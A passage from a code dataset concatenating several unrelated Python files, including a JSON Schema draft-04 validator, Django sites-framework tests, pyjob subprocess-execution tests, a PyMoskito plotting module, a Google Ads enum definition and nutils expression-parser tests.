.. _`JSON Schema`: http://json-schema.org
"""
schm = deepcopy(schema)
scope = urljoin(scope or str(pointer), schm.pop('id', None))
if '$ref' in schema:
return ReferenceValidator(urljoin(scope, schema['$ref']), context)
attrs = {}
if 'additionalItems' in schm:
subpointer = pointer_join(pointer, 'additionalItems')
attrs['additional_items'] = schm.pop('additionalItems')
if isinstance(attrs['additional_items'], dict):
compiled = compile(attrs['additional_items'],
subpointer,
context,
scope)
attrs['additional_items'] = compiled
elif not isinstance(attrs['additional_items'], bool):
raise CompilationError('wrong type for {}'.format('additional_items'), schema) # noqa
if 'additionalProperties' in schm:
subpointer = pointer_join(pointer, 'additionalProperties')
attrs['additional_properties'] = schm.pop('additionalProperties')
if isinstance(attrs['additional_properties'], dict):
compiled = compile(attrs['additional_properties'],
subpointer,
context,
scope)
attrs['additional_properties'] = compiled
elif not isinstance(attrs['additional_properties'], bool):
raise CompilationError('wrong type for {}'.format('additional_properties'), schema) # noqa
if 'allOf' in schm:
subpointer = pointer_join(pointer, 'allOf')
attrs['all_of'] = schm.pop('allOf')
if isinstance(attrs['all_of'], (list, tuple)):
attrs['all_of'] = [compile(element, subpointer, context, scope) for element in attrs['all_of']] # noqa
else:
            # allOf must be an array of schemas
raise CompilationError('wrong type for {}'.format('allOf'), schema) # noqa
if 'anyOf' in schm:
subpointer = pointer_join(pointer, 'anyOf')
attrs['any_of'] = schm.pop('anyOf')
if isinstance(attrs['any_of'], (list, tuple)):
attrs['any_of'] = [compile(element, subpointer, context, scope) for element in attrs['any_of']] # noqa
else:
            # anyOf must be an array of schemas
raise CompilationError('wrong type for {}'.format('anyOf'), schema) # noqa
if 'default' in schm:
attrs['default'] = schm.pop('default')
if 'dependencies' in schm:
attrs['dependencies'] = schm.pop('dependencies')
if not isinstance(attrs['dependencies'], dict):
raise CompilationError('dependencies must be an object', schema)
for key, value in attrs['dependencies'].items():
if isinstance(value, dict):
subpointer = pointer_join(pointer, 'dependencies', key)
attrs['dependencies'][key] = compile(value,
subpointer,
context,
scope)
elif not isinstance(value, sequence_types):
raise CompilationError('dependencies must be an array or object', schema) # noqa
if 'enum' in schm:
attrs['enum'] = schm.pop('enum')
if not isinstance(attrs['enum'], sequence_types):
raise CompilationError('enum must be a sequence', schema)
if 'exclusiveMaximum' in schm:
attrs['exclusive_maximum'] = schm.pop('exclusiveMaximum')
if not isinstance(attrs['exclusive_maximum'], bool):
raise CompilationError('exclusiveMaximum must be a boolean', schema) # noqa
if 'exclusiveMinimum' in schm:
attrs['exclusive_minimum'] = schm.pop('exclusiveMinimum')
if not isinstance(attrs['exclusive_minimum'], bool):
raise CompilationError('exclusiveMinimum must be a boolean', schema) # noqa
if 'format' in schm:
attrs['format'] = schm.pop('format')
if not isinstance(attrs['format'], string_types):
raise CompilationError('format must be a string', schema)
if 'items' in schm:
subpointer = pointer_join(pointer, 'items')
attrs['items'] = schm.pop('items')
if isinstance(attrs['items'], (list, tuple)):
# each value must be a json schema
attrs['items'] = [compile(element, subpointer, context, scope) for element in attrs['items']] # noqa
elif isinstance(attrs['items'], dict):
# value must be a json schema
attrs['items'] = compile(attrs['items'], subpointer, context, scope) # noqa
else:
            # items must be an object or an array of schemas
raise CompilationError('wrong type for {}'.format('items'), schema) # noqa
if 'maximum' in schm:
attrs['maximum'] = schm.pop('maximum')
if not isinstance(attrs['maximum'], number_types):
raise CompilationError('maximum must be a number', schema)
if 'maxItems' in schm:
attrs['max_items'] = schm.pop('maxItems')
if not isinstance(attrs['max_items'], integer_types):
raise CompilationError('maxItems must be integer', schema)
if 'maxLength' in schm:
attrs['max_length'] = schm.pop('maxLength')
if not isinstance(attrs['max_length'], integer_types):
raise CompilationError('maxLength must be integer', schema)
if 'maxProperties' in schm:
attrs['max_properties'] = schm.pop('maxProperties')
if not isinstance(attrs['max_properties'], integer_types):
raise CompilationError('maxProperties must be integer', schema)
if 'minimum' in schm:
attrs['minimum'] = schm.pop('minimum')
if not isinstance(attrs['minimum'], number_types):
raise CompilationError('minimum must be a number', schema)
if 'minItems' in schm:
attrs['min_items'] = schm.pop('minItems')
if not isinstance(attrs['min_items'], integer_types):
raise CompilationError('minItems must be integer', schema)
if 'minLength' in schm:
attrs['min_length'] = schm.pop('minLength')
if not isinstance(attrs['min_length'], integer_types):
raise CompilationError('minLength must be integer', schema)
if 'minProperties' in schm:
attrs['min_properties'] = schm.pop('minProperties')
if not isinstance(attrs['min_properties'], integer_types):
raise CompilationError('minProperties must be integer', schema)
if 'multipleOf' in schm:
attrs['multiple_of'] = schm.pop('multipleOf')
if not isinstance(attrs['multiple_of'], number_types):
raise CompilationError('multipleOf must be a number', schema)
if 'not' in schm:
attrs['not'] = schm.pop('not')
if not isinstance(attrs['not'], dict):
raise CompilationError('not must be an object', schema)
subpointer = pointer_join(pointer, 'not')
attrs['not'] = compile(attrs['not'], subpointer, context, scope)
if 'oneOf' in schm:
subpointer = pointer_join(pointer, 'oneOf')
attrs['one_of'] = schm.pop('oneOf')
if isinstance(attrs['one_of'], (list, tuple)):
# each value must be a json schema
attrs['one_of'] = [compile(element, subpointer, context, scope) for element in attrs['one_of']] # noqa
else:
            # oneOf must be an array of schemas
raise CompilationError('wrong type for {}'.format('oneOf'), schema)
if 'pattern' in schm:
attrs['pattern'] = schm.pop('pattern')
if not isinstance(attrs['pattern'], string_types):
raise CompilationError('pattern must be a string', schema)
if 'properties' in schm:
attrs['properties'] = schm.pop('properties')
if not isinstance(attrs['properties'], dict):
raise CompilationError('properties must be an object', schema)
for subname, subschema in attrs['properties'].items():
subpointer = pointer_join(pointer, subname)
compiled = compile(subschema, subpointer, context, scope)
attrs['properties'][subname] = compiled
if 'patternProperties' in schm:
attrs['pattern_properties'] = schm.pop('patternProperties')
if not isinstance(attrs['pattern_properties'], dict):
raise CompilationError('patternProperties must be an object', schema) # noqa
for subname, subschema in attrs['pattern_properties'].items():
subpointer = pointer_join(pointer, 'patternProperties', subname)
compiled = compile(subschema, subpointer, context, scope)
attrs['pattern_properties'][subname] = compiled
if 'required' in schm:
attrs['required'] = schm.pop('required')
if not isinstance(attrs['required'], list):
raise CompilationError('required must be a list', schema)
if len(attrs['required']) < 1:
raise CompilationError('required cannot be empty', schema)
if 'type' in schm:
attrs['type'] = schm.pop('type')
if isinstance(attrs['type'], string_types):
attrs['type'] = [attrs['type']]
elif not isinstance(attrs['type'], sequence_types):
raise CompilationError('type must be string or sequence', schema)
if 'uniqueItems' in schm:
attrs['unique_items'] = schm.pop('uniqueItems')
if not isinstance(attrs['unique_items'], bool):
raise CompilationError('type must be boolean', schema)
return Draft04Validator(attrs, str(pointer), context.formats)
class Draft04Validator(Validator):
"""
Implements `JSON Schema`_ draft-04 validation.
:ivar attrs: attributes to validate against
:ivar uri: uri of the current validator
:ivar formats: mapping of available formats
>>> validator = Draft04Validator({'min_length': 4})
>>> assert validator('this is sparta')
.. _`JSON Schema`: http://json-schema.org
"""
def __init__(self, attrs, uri=None, formats=None):
attrs = {uncamel(k): v for k, v in attrs.items()}
self.formats = formats or {}
self.attrs = attrs
self.attrs.setdefault('additional_items', True)
self.attrs.setdefault('additional_properties', True)
        self.attrs.setdefault('exclusive_maximum', False)
        self.attrs.setdefault('exclusive_minimum', False)
self.attrs.setdefault('pattern_properties', {})
self.attrs.setdefault('properties', {})
self.uri = uri
self.default = self.attrs.get('default', None)
self.fail_fast = True
self.errors = []
def validate(self, obj, pointer=None):
"""
Validate object against validator
:param obj: the object to validate
"""
pointer = pointer or '#'
validator = deepcopy(self)
validator.errors = []
validator.fail_fast = False
obj = deepcopy(obj)
obj = validator.validate_enum(obj, pointer)
obj = validator.validate_type(obj, pointer)
obj = validator.validate_not(obj, pointer)
obj = validator.validate_all_of(obj, pointer)
obj = validator.validate_any_of(obj, pointer)
obj = validator.validate_one_of(obj, pointer)
if self.is_array(obj):
obj = validator.validate_items(obj, pointer)
obj = validator.validate_max_items(obj, pointer)
obj = validator.validate_min_items(obj, pointer)
obj = validator.validate_unique_items(obj, pointer)
elif self.is_number(obj):
obj = validator.validate_maximum(obj, pointer)
obj = validator.validate_minimum(obj, pointer)
obj = validator.validate_multiple_of(obj, pointer)
elif self.is_object(obj):
obj = validator.validate_required(obj, pointer)
obj = validator.validate_max_properties(obj, pointer)
obj = validator.validate_min_properties(obj, pointer)
obj = validator.validate_dependencies(obj, pointer)
obj = validator.validate_properties(obj, pointer)
obj = validator.validate_default_properties(obj, pointer)
elif self.is_string(obj):
obj = validator.validate_max_length(obj, pointer)
obj = validator.validate_min_length(obj, pointer)
obj = validator.validate_pattern(obj, pointer)
obj = validator.validate_format(obj, pointer)
if validator.errors:
raise ValidationError('multiple errors',
obj,
errors=validator.errors)
return obj
def is_array(self, obj):
return isinstance(obj, sequence_types)
def is_boolean(self, obj):
return isinstance(obj, bool)
def is_integer(self, obj):
return isinstance(obj, integer_types) and not isinstance(obj, bool)
def is_number(self, obj):
return isinstance(obj, number_types) and not isinstance(obj, bool)
def is_object(self, obj):
return isinstance(obj, dict)
def is_string(self, obj):
return isinstance(obj, string_types)
def has_default(self):
return 'default' in self.attrs
def validate_all_of(self, obj, pointer=None):
for validator in self.attrs.get('all_of', []):
obj = validator(obj)
return obj
def validate_any_of(self, obj, pointer=None):
if 'any_of' in self.attrs:
for validator in self.attrs['any_of']:
try:
obj = validator(obj)
return obj
except ValidationError:
pass
self.fail('Not in any_of', obj, pointer)
return obj
def validate_default_properties(self, obj, pointer=None):
# Reinject defaults from properties.
for name, validator in self.attrs.get('properties', {}).items():
if name not in obj and validator.has_default():
obj[name] = deepcopy(validator.default)
return obj
def validate_dependencies(self, obj, pointer=None):
for key, dependencies in self.attrs.get('dependencies', {}).items():
if key in obj:
if isinstance(dependencies, sequence_types):
for name in set(dependencies) - set(obj.keys()):
self.fail('Missing property', obj, pointer_join(pointer, name)) # noqa
else:
dependencies(obj)
return obj
def validate_enum(self, obj, pointer=None):
if 'enum' in self.attrs:
if obj not in self.attrs['enum']:
self.fail('Forbidden value', obj, pointer)
return obj
def validate_format(self, obj, pointer=None):
"""
================= ============
Expected draft04 Alias of
----------------- ------------
date-time rfc3339.datetime
email email
hostname hostname
ipv4 ipv4
ipv6 ipv6
uri uri
================= ============
"""
if 'format' in self.attrs:
substituted = {
'date-time': 'rfc3339.datetime',
'email': 'email',
'hostname': 'hostname',
'ipv4': 'ipv4',
'ipv6': 'ipv6',
'uri': 'uri',
}.get(self.attrs['format'], self.attrs['format'])
logger.debug('use %s', substituted)
try:
return self.formats[substituted](obj)
except ValidationError as error:
logger.error(error)
self.fail('Forbidden value', obj, pointer)
return obj
def validate_items(self, obj, pointer=None):
if 'items' in self.attrs:
items = self.attrs['items']
if isinstance(items, Validator):
validator = items
for index, element in enumerate(obj):
with self.catch_fail():
obj[index] = validator(element, pointer_join(pointer, index)) # noqa
return obj
elif isinstance(items, (list, tuple)):
additionals = self.attrs['additional_items']
validators = items
validated = list(obj)
for index, element in enumerate(validated):
with self.catch_fail():
try:
validator = validators[index]
except IndexError:
if additionals is True:
return obj
elif additionals is False:
self.fail('Forbidden value',
obj,
pointer=pointer_join(self.uri, index)) # noqa
continue
validator = additionals
validated[index] = \
validator(element, pointer_join(pointer, index)) # noqa
obj = obj.__class__(validated)
return obj
else:
raise NotImplementedError(items)
return obj
def validate_maximum(self, obj, pointer=None):
if 'maximum' in self.attrs:
m = self.attrs['maximum']
if obj < m:
return obj
exclusive = self.attrs['exclusive_maximum']
if not exclusive and (obj == m):
return obj
self.fail('Exceeded maximum', obj, pointer)
return obj
def validate_max_items(self, obj, pointer=None):
if 'max_items' in self.attrs:
count = len(obj)
if count > self.attrs['max_items']:
self.fail('Too many elements', obj, pointer)
return obj
def validate_max_length(self, obj, pointer=None):
if 'max_length' in self.attrs:
length = len(obj)
if length > self.attrs['max_length']:
self.fail('Too long', obj, pointer)
return obj
def validate_max_properties(self, obj, pointer=None):
if 'max_properties' in self.attrs:
count = len(obj)
if count > self.attrs['max_properties']:
self.fail('Too many properties', obj, pointer)
return obj
def validate_minimum(self, obj, pointer=None):
if 'minimum' in self.attrs:
m = self.attrs['minimum']
if obj > m:
return obj
exclusive = self.attrs['exclusive_minimum']
if not exclusive and (obj == m):
return obj
self.fail('Too small', obj, pointer)
return obj
def validate_min_items(self, obj, pointer=None):
if 'min_items' in self.attrs:
count = len(obj)
if count < self.attrs['min_items']:
self.fail('Too few elements', obj, pointer)
return obj
def validate_min_length(self, obj, pointer=None):
if 'min_length' in self.attrs:
length = len(obj)
if length < self.attrs['min_length']:
self.fail('Too short', obj, pointer)
return obj
def validate_min_properties(self, obj, pointer=None):
if 'min_properties' in self.attrs:
count = len(obj)
if count < self.attrs['min_properties']:
self.fail('Too few properties', obj, pointer)
return obj
def validate_multiple_of(self, obj, pointer=None):
if 'multiple_of' in self.attrs:
factor = Decimal(str(self.attrs['multiple_of']))
orig = Decimal(str(obj))
if orig % factor != 0:
self.fail('Forbidden value', obj, pointer)
return obj
def validate_not(self, obj, pointer=None):
if 'not' in self.attrs:
try:
validator = self.attrs['not']
validator(obj)
except ValidationError:
return obj
else:
self.fail('Forbidden value', obj, pointer)
return obj
def validate_one_of(self, obj, pointer=None):
if 'one_of' in self.attrs:
validated = 0
for validator in self.attrs['one_of']:
try:
validated_obj = validator(obj)
validated += 1
except ValidationError:
pass
if not validated:
self.fail('Validates noone', obj)
elif validated == 1:
return validated_obj
else:
self.fail('Validates more than once', obj)
return obj
def validate_pattern(self, obj, pointer=None):
if 'pattern' in self.attrs:
pattern = self.attrs['pattern']
if re.search(pattern, obj):
return obj
self.fail('Forbidden value', obj, pointer)
return obj
def validate_properties(self, obj, pointer=None):
validated = set()
pending = set(obj.keys())
response = {}
if not obj:
return response
for name, validator in self.attrs['properties'].items():
if name in obj:
with self.catch_fail():
pending.discard(name)
obj[name] = validator(obj[name], pointer_join(pointer, name)) # noqa
validated.add(name)
for pattern, validator in self.attrs['pattern_properties'].items():
for name in sorted(obj.keys()):
if re.search(pattern, name):
with self.catch_fail():
pending.discard(name)
obj[name] = validator(obj[name], pointer_join(pointer, name)) # noqa
validated.add(name)
if not pending:
return obj
additionals = self.attrs['additional_properties']
if additionals is True:
return obj
if additionals is False:
for name in pending:
self.fail('Forbidden property', obj, pointer_join(pointer, name)) # noqa
return obj
validator = additionals
for name in sorted(pending):
obj[name] = validator(obj.pop(name), pointer_join(pointer, name)) # noqa
validated.add(name)
return obj
def validate_required(self, obj, pointer=None):
if 'required' in self.attrs:
for name in self.attrs['required']:
if name not in obj:
self.fail('Missing property', obj, pointer_join(pointer, name)) # noqa
return obj
def validate_type(self, obj, pointer=None):
if 'type' in self.attrs:
types = self.attrs['type']
if isinstance(types, string_types):
types = [types]
for t in types:
if t == 'array' and self.is_array(obj):
return obj
if t == 'boolean' and self.is_boolean(obj):
return obj
if t == 'integer' and self.is_integer(obj):
return obj
if t == 'number' and self.is_number(obj):
return obj
if t == 'null' and obj is None:
return obj
if t == 'object' and self.is_object(obj):
return obj
if t == 'string' and self.is_string(obj):
return obj
self.fail('Wrong type', obj, pointer)
return obj
def validate_unique_items(self, obj, pointer=None):
if self.attrs.get('unique_items'):
if len(obj) > len(set(json.dumps(element) for element in obj)):
self.fail('Elements must be unique', obj, pointer)
return obj
def is_optional(self):
"""
        Returns True, because it is meaningless in draft04.
"""
logger.warn('asking for is_optional')
return True
def fail(self, reason, obj, pointer=None):
"""
Called when validation fails.
"""
pointer = pointer_join(pointer)
err = ValidationError(reason, obj, pointer)
if self.fail_fast:
raise err
else:
self.errors.append(err)
return err
def catch_fail(self):
return FailCatcher(self)
class FailCatcher(object):
def __init__(self, validator):
self.validator = validator
def __enter__(self):
return self
def __exit__(self, type, value, tb):
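        # when not failing fast, record the error and suppress the exception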
if isinstance(value, ValidationError) and not self.validator.fail_fast:
self.validator.errors.append(value)
return True
return False
| bsd-3-clause | -2,568,410,251,468,870,000 | 37.348018 | 115 | 0.562474 | false |
yephper/django | tests/sites_framework/tests.py | 1 | 5520 | from django.conf import settings
from django.contrib.sites.managers import CurrentSiteManager
from django.contrib.sites.models import Site
from django.core import checks
from django.db import models
from django.test import SimpleTestCase, TestCase
from django.test.utils import isolate_apps
from .models import CustomArticle, ExclusiveArticle, SyndicatedArticle
class SitesFrameworkTestCase(TestCase):
def setUp(self):
Site.objects.get_or_create(id=settings.SITE_ID, domain="example.com", name="example.com")
Site.objects.create(id=settings.SITE_ID + 1, domain="example2.com", name="example2.com")
def test_site_fk(self):
article = ExclusiveArticle.objects.create(title="Breaking News!", site_id=settings.SITE_ID)
self.assertEqual(ExclusiveArticle.on_site.all().get(), article)
def test_sites_m2m(self):
article = SyndicatedArticle.objects.create(title="Fresh News!")
article.sites.add(Site.objects.get(id=settings.SITE_ID))
article.sites.add(Site.objects.get(id=settings.SITE_ID + 1))
article2 = SyndicatedArticle.objects.create(title="More News!")
article2.sites.add(Site.objects.get(id=settings.SITE_ID + 1))
self.assertEqual(SyndicatedArticle.on_site.all().get(), article)
def test_custom_named_field(self):
article = CustomArticle.objects.create(
title="Tantalizing News!",
places_this_article_should_appear_id=settings.SITE_ID,
)
self.assertEqual(CustomArticle.on_site.all().get(), article)
@isolate_apps('sites_framework')
class CurrentSiteManagerChecksTests(SimpleTestCase):
def test_invalid_name(self):
class InvalidArticle(models.Model):
on_site = CurrentSiteManager("places_this_article_should_appear")
errors = InvalidArticle.check()
expected = [
checks.Error(
"CurrentSiteManager could not find a field named "
"'places_this_article_should_appear'.",
obj=InvalidArticle.on_site,
id='sites.E001',
)
]
self.assertEqual(errors, expected)
def test_invalid_field_type(self):
class ConfusedArticle(models.Model):
site = models.IntegerField()
on_site = CurrentSiteManager()
errors = ConfusedArticle.check()
expected = [
checks.Error(
"CurrentSiteManager cannot use 'ConfusedArticle.site' as it is "
"not a foreign key or a many-to-many field.",
obj=ConfusedArticle.on_site,
id='sites.E002',
)
]
self.assertEqual(errors, expected)
| bsd-3-clause | -6,722,924,623,333,033,000 | 37.111888 | 99 | 0.647283 | false |
fsimkovic/pyjob | pyjob/tests/test_cexec.py | 1 | 2326 | __author__ = 'Felix Simkovic'
import os
import pytest
import sys
from pyjob.cexec import cexec
from pyjob.exception import PyJobExecutableNotFoundError, PyJobExecutionError
class TestCexec(object):
def test_1(self):
stdout = cexec([sys.executable, '-c', 'import sys; print("hello"); sys.exit(0)'])
assert stdout == 'hello'
def test_2(self):
with pytest.raises(PyJobExecutionError):
cexec([sys.executable, '-c', 'import sys; sys.exit(1)'])
def test_3(self):
cmd = [sys.executable, '-c', 'import sys; print("hello"); sys.exit(1)']
stdout = cexec(cmd, permit_nonzero=True)
assert stdout == 'hello'
def test_4(self):
if sys.version_info < (3, 0):
cmd = [sys.executable, '-c', 'import sys; print(raw_input()); sys.exit(0)']
else:
cmd = [sys.executable, '-c', 'import sys; print(input()); sys.exit(0)']
stdout = cexec(cmd, stdin='hello')
assert stdout == 'hello'
def test_5(self):
cmd = [sys.executable, '-c', 'import os, sys; print(os.getcwd()); sys.exit(0)']
directory = os.path.join(os.getcwd())
stdout = cexec(cmd, cwd=directory)
assert stdout == directory
def test_6(self):
cmd = [sys.executable, '-c', 'import sys; print("hello"); sys.exit(0)']
fname = 'test.log'
with open(fname, 'w') as f:
stdout = cexec(cmd, stdout=f)
assert stdout is None
with open(fname, 'r') as f:
assert f.read().strip() == 'hello'
pytest.helpers.unlink([fname])
def test_7(self):
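        # when stdout/stderr are redirected to file handles, cexec returns None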
cmd = [sys.executable, '-c', 'import os, sys; print(os.getcwd()); sys.exit("error message")']
directory = os.path.join(os.getcwd())
with open('stdout.log', 'w') as fstdout, open('stderr.log', 'w') as fstderr:
stdout = cexec(cmd, stdout=fstdout, stderr=fstderr, permit_nonzero=True)
assert stdout is None
with open('stdout.log', 'r') as f:
assert f.read().strip() == directory
with open('stderr.log', 'r') as f:
assert f.read().strip() == 'error message'
pytest.helpers.unlink(['stdout.log', 'stderr.log'])
def test_8(self):
with pytest.raises(PyJobExecutableNotFoundError):
cexec(['fjezfsdkj'])
| mit | -6,436,261,199,304,623,000 | 35.920635 | 101 | 0.578246 | false |
cklb/PyMoskito | pymoskito/metaprocessing/eval_L1NormITAE_poles_linePlot.py | 1 | 3126 | # -*- coding: utf-8 -*-
from tools import getSubValue
# mpl.rcParams['text.usetex']=True
# mpl.rcParams['text.latex.unicode']=True
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from processing_gui import MetaProcessingModule
from tools import sortTree
class eval_L1NormITAE_poles_linePlot(MetaProcessingModule):
"""
    create diagrams that plot the L1NormITAE metric over the controller poles
"""
def __init__(self):
MetaProcessingModule.__init__(self)
return
def run(self, post_results):
# create tree with all relevant data
source = sortTree(post_results, ['modules', 'controller', 'type'])
# Get the Poles for the Minimum
for controller in source:
x_path = ['modules', 'controller', 'poles']
y_path = ['metrics', 'L1NormITAE']
x_list = getSubValue(source[controller], x_path)
y_list = getSubValue(source[controller], y_path)
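            # drop runs for which the metric could not be computed (None entries)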
x_list[:] = [x for x, y in zip(x_list, y_list) if y]
y_list[:] = [i for i in y_list if i]
self._logger.info("processing controller '{}'".format(controller))
self._logger.info("min ITAE {}".format(min(y_list)))
self._logger.info("opt poles {}".format(x_list[y_list.index(min(y_list))][0]))
# create plot
fig = Figure()
# fig.subplots_adjust(wspace=20, hspace=10, h_pad=50)
fig.subplots_adjust(wspace=0.6, hspace=0.6)
# plot for L1NormITAE over poles
axes = fig.add_subplot(111)
self.plotVariousController(source, axes,
xPath=['modules', 'controller', 'poles'],
yPath=['metrics', 'L1NormITAE'],
typ='line',
xIndex=0)
self.plotSettings(axes,
                          titel=r'ITAE error integral over pole placement',
grid=True,
xlabel=r'$Poles \, \lbrack s\rbrack$',
ylabel=r'$E \, \lbrack ms^{2} \rbrack$',
)
# error minimum
for controllerName in source.keys():
error_list = getSubValue(source[controllerName], ['metrics', 'L1NormITAE'])
error_min = min(x for x in error_list if x is not None)
error_min_index = error_list.index(error_min)
poles = getSubValue(source[controllerName], ['modules', 'controller', 'poles'])[error_min_index][0]
self._logger.info("minimum error of {} for {} with poles at {}".format(error_min, controllerName, poles))
# extract controllerNames
controller_names = [x[:-len('Controller')] for x in source.keys()]
canvas = FigureCanvas(fig)
# write output files
file_name = self.name[len('eval_'):] \
+ '_Controller_(' + ''.join(controller_names) + ')'
self.writeOutputFiles(file_name, fig)
return [{'figure': canvas, 'name': self.name}]
| bsd-3-clause | 3,792,409,148,593,499,000 | 39.597403 | 117 | 0.564939 | false |
googleads/google-ads-python | google/ads/googleads/v6/enums/types/search_term_match_type.py | 1 | 1277 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v6.enums",
marshal="google.ads.googleads.v6",
manifest={"SearchTermMatchTypeEnum",},
)
class SearchTermMatchTypeEnum(proto.Message):
r"""Container for enum describing match types for a keyword
triggering an ad.
"""
class SearchTermMatchType(proto.Enum):
r"""Possible match types for a keyword triggering an ad,
including variants.
"""
UNSPECIFIED = 0
UNKNOWN = 1
BROAD = 2
EXACT = 3
PHRASE = 4
NEAR_EXACT = 5
NEAR_PHRASE = 6
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 571,851,014,140,160,960 | 26.76087 | 74 | 0.676586 | false |
wijnandhoitinga/nutils | tests/test_expression.py | 1 | 28965 | import nutils.expression
from nutils.testing import *
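# helper to wrap a value as an AST leaf, i.e. the (None, value) tuples the parser emits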
_ = lambda arg: (None, arg)
class Array:
def __init__(self, text, shape):
self.text = text
self.shape = tuple(shape)
self.ndim = len(self.shape)
def __len__(self):
return self.shape[0]
def __str__(self):
return self.text
def __repr__(self):
return self.text
def __eq__(self, other):
return type(self) == type(other) and self.text == other.text
def __hash__(self):
return hash(self.text)
class Variables:
def __init__(self, x, altgeom, funcoverride):
self.x = x
self.altgeom = altgeom
self.funcoverride = funcoverride
self._lengths = {str(i): i for i in range(10)}
def __getitem__(self, name):
if not name.startswith('_'):
try:
return getattr(self, name)
except AttributeError:
pass
raise KeyError(name)
def __contains__(self, name):
try:
self[name]
return True
except KeyError:
return False
def __getattr__(self, name):
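    # '_<name>' wraps the attribute as an AST leaf tuple; 'a<suffix>' builds a test
    # Array whose shape is read off the suffix (digits give fixed lengths)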
if name.startswith('_'):
return _(getattr(self, name[1:]))
elif name.startswith('a'):
return Array(name, tuple(self._lengths.get(i, nutils.expression._Length(ord(i))) for i in name[1:]))
else:
raise AttributeError(name)
def get(self, name, default):
try:
return self[name]
except KeyError:
return default
v = Variables(x=Array('x', [2]), altgeom=Array('altgeom', [3]), funcoverride=Array('funcoverride', []))
functions = dict(func1=1, func2=2, func3=3, funcoverride=1)
class parse(TestCase):
def assert_ast(self, expression, indices, ast, variables=None, **parse_kwargs):
if variables is None:
variables = v
self.assertEqual(nutils.expression.parse(expression, variables, functions, indices, **parse_kwargs)[0], ast)
def assert_syntax_error(self, msg, expression, indices, highlight, arg_shapes={}, fixed_lengths=None, exccls=nutils.expression.ExpressionSyntaxError):
with self.assertRaises(exccls) as cm:
nutils.expression.parse(expression, v, functions, indices, arg_shapes, fixed_lengths=fixed_lengths)
self.assertEqual(str(cm.exception), msg + '\n' + expression + '\n' + highlight)
# OTHER
def test_no_indices_0(self): self.assert_ast('a', None, v._a)
def test_no_indices_1(self): self.assert_ast('a2_i', None, v._a2)
def test_ambiguous_alignment(self):
self.assert_syntax_error(
"Cannot unambiguously align the array because the array has more than one dimension.",
"a23_ij", None,
"^^^^^^",
exccls=nutils.expression.AmbiguousAlignmentError)
def test_mul_2(self):
self.assert_ast('a2_i a3_j', 'ij',
('mul',
('append_axis', v._a2, _(3)),
('transpose',
('append_axis', v._a3, _(2)),
_((1,0)))))
def test_mul_add_sub(self):
self.assert_ast('1_j a2_i + 1_i a3_j - a23_ij', 'ij',
('transpose',
('sub',
('add',
('mul',
('append_axis', ('append_axis', _(1), _(3)), _(2)),
('transpose', ('append_axis', v._a2, _(3)), _((1,0)))),
('transpose',
('mul',
('append_axis', ('append_axis', _(1), _(2)), _(3)),
('transpose', ('append_axis', v._a3, _(2)), _((1,0)))),
_((1,0)))),
('transpose', v._a23, _((1,0)))),
_((1,0))))
def test_mul_reduce_2(self):
self.assert_ast('a2_i a23_ij a3_j', '',
('sum',
('mul',
('sum',
('mul',
('append_axis', v._a2, _(3)),
v._a23),
_(0)),
v._a3),
_(0)))
def test_dupl_indices_1(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a3_j a2_i,ii a2_k", "i",
" ^^^^^^^")
def test_missing_indices_1(self):
self.assert_syntax_error(
"Expected 1 index, got 2.",
"a2_i a3_ij a2_j", "",
" ^^^^^")
def test_missing_indices_2(self):
self.assert_syntax_error(
"Expected 2 indices, got 0.",
"a2_i a23 a2_j", "ij",
" ^^^")
def test_wrap_array_trace(self): self.assert_ast('a222_ijj', 'i', ('trace', v._a222, _(1), _(2)))
def test_div_const_scalar(self): self.assert_ast('a2_i / 1', 'i', ('truediv', v._a2, _(1)))
def test_div_scalar_variable(self): self.assert_ast('a2_i / a', 'i', ('truediv', v._a2, v._a))
def test_div_scalar_sum(self): self.assert_ast('a2_i / 2 a3_j a3_j', 'i', ('truediv', v._a2, ('sum', ('mul', ('mul', ('append_axis', _(2), _(3)), v._a3), v._a3), _(0))))
def test_array_denominator(self):
self.assert_syntax_error(
"A denominator must have dimension 0.",
"a2_i / a3_j", "ij",
" ^^^^")
def test_duplicate_indices_numerator_denominator(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"1 + a2_i a2_i / a3_i a3_i", "",
" ^^^^^^^^^^^^^^^^^^^^^")
def test_duplicate_indices_2(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a2_i (a3_i a23_ji)", "ij",
"^^^^^^^^^^^^^^^^^^")
def test_duplicate_indices_3(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a2_i (a3_i a23_ji)", "ij",
"^^^^^^^^^^^^^^^^^^")
def test_duplicate_indices_4(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a222_iii", "",
"^^^^^^^^")
def test_leading_zeros_int(self):
self.assert_syntax_error(
"Leading zeros are forbidden.",
"1 + 01", "",
" ^^")
def test_leading_zeros_float(self):
self.assert_syntax_error(
"Leading zeros are forbidden.",
"1 + 01.0", "",
" ^^^^")
def test_missing_indices_3(self):
self.assert_syntax_error(
"Missing indices.",
"a22_ij + a2_", "ij",
" ^")
def test_missing_gradient_indices_1(self):
self.assert_syntax_error(
"Missing indices.",
"a22_ij + a2_,", "ij",
" ^")
def test_missing_whitespace_add_right(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i +a2_i", "i",
" ^")
def test_missing_whitespace_add_left(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i+ a2_i", "i",
" ^")
def test_missing_whitespace_sub_right(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i -a2_i", "i",
" ^")
def test_missing_whitespace_sub_left(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i- a2_i", "i",
" ^")
def test_int(self):
self.assert_ast('1', '', _(1))
def test_float(self):
for f in '10', '1', '1.', '.1', '1.2', '0.01', '10.0':
self.assert_ast(f, '', _(float(f)))
def test_scientific(self):
